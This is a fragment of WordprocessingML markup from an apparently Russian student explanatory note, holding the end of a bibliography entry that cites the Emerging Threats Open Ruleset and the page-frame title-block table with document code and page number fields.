        <w:t>Proofpoint. Emerging Threats Open Ruleset [</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</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ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">]. — URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://rules.emergingthreats.net/</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дата</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обращения</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 01.05.2026).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA6A02" w14:textId="16BEE182" w:rsidR="00AA70B6" w:rsidRPr="00CE4D59" w:rsidRDefault="00AA70B6" w:rsidP="003320E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AA70B6" w:rsidRPr="00CE4D59" w:rsidSect="00352169">
      <w:headerReference w:type="default" r:id="rId67"/>
      <w:footerReference w:type="default" r:id="rId68"/>
      <w:headerReference w:type="first" r:id="rId69"/>
      <w:footerReference w:type="first" r:id="rId70"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="851" w:right="680" w:bottom="1701" w:left="1531" w:header="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F9958" w14:textId="77777777" w:rsidR="000C52A4" w:rsidRDefault="000C52A4" w:rsidP="000F3CF9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7BCF7D12" w14:textId="77777777" w:rsidR="000C52A4" w:rsidRDefault="000C52A4" w:rsidP="000F3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CC"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Andale Sans UI">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>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1D9A" w14:textId="77777777" w:rsidR="004654AE" w:rsidRDefault="004654A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7340E" w14:textId="77777777" w:rsidR="002519A3" w:rsidRDefault="002519A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376" w:type="dxa"/>
      <w:tblInd w:w="-369"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0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="400"/>
      <w:gridCol w:w="570"/>
      <w:gridCol w:w="1311"/>
      <w:gridCol w:w="854"/>
      <w:gridCol w:w="570"/>
      <w:gridCol w:w="6101"/>
      <w:gridCol w:w="570"/>
    </w:tblGrid>
    <w:tr w:rsidR="002674A5" w14:paraId="7BE1977D" w14:textId="77777777" w:rsidTr="00B94CE4">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="398" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="7C0F2209" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="6B99A947" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="01000C4C" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="79E46AB1" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4ADDF326" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="498"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6067" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="3FC5DEEF" w14:textId="205D8BB9" w:rsidR="002674A5" w:rsidRPr="00751F4F" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:right="144"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>МИВУ.0</w:t>
          </w:r>
          <w:r w:rsidR="00131487">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>.03.02-00.000      ПЗ</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="25064068" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="004B538F" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лист</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="002674A5" w14:paraId="6D993463" w14:textId="77777777" w:rsidTr="00B94CE4">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="398" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="187DA214" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="26BFA2EC" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="20DA006B" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="664EC3B0" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="76B62754" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="498"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6067" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="450FAD0A" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="056E254A" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="004B538F" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="004B538F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="004B538F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> PAGE  \* Arabic  \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r w:rsidRPr="004B538F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>7</w:t>
          </w:r>
          <w:r w:rsidRPr="004B538F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="002674A5" w14:paraId="0F87CA75" w14:textId="77777777" w:rsidTr="00352169">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="398" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="nil"/>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="297BB61F" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Изм</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="0A069C5B" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лист</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="3AA90169" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>№ докум.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="00A7F563" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Подп.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="467D7B15" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="498"/>
            </w:tabs>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Дата</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6067" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="56E79D3C" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="0E87EC7A" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="3A52304D" w14:textId="77777777" w:rsidR="004654AE" w:rsidRPr="00444D35" w:rsidRDefault="004654AE" w:rsidP="002674A5">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:rPr>
        <w:sz w:val="32"/>
        <w:szCs w:val="3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376" w:type="dxa"/>
      <w:tblInd w:w="-369"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0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="393"/>
      <w:gridCol w:w="561"/>
      <w:gridCol w:w="1400"/>
      <w:gridCol w:w="730"/>
      <w:gridCol w:w="561"/>
      <w:gridCol w:w="3924"/>
      <w:gridCol w:w="281"/>
      <w:gridCol w:w="281"/>
      <w:gridCol w:w="281"/>
      <w:gridCol w:w="954"/>
      <w:gridCol w:w="1010"/>
    </w:tblGrid>
    <w:tr w:rsidR="00361A27" w14:paraId="4E4193C5" w14:textId="77777777" w:rsidTr="005541FA">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="393" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="nil"/>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="45207A2B" w14:textId="7D15580E" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="09FB9406" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1400" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="136A59D6" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="730" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="72052E4C" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="561" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4BCE055B" w14:textId="77777777" w:rsidR="00361A27" w:rsidRPr="00984376" w:rsidRDefault="00361A27">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6731" w:type="dxa"/>
          <w:gridSpan w:val="6"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:right w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="00A82935" w14:textId="238F9C29" w:rsidR="00361A27" w:rsidRPr="00751F4F" w:rsidRDefault="00512D96" w:rsidP="00512D96">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="4677"/>
              <w:tab w:val="center" w:pos="4370"/>
            </w:tabs>
            <w:ind w:right="144" w:hanging="450"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
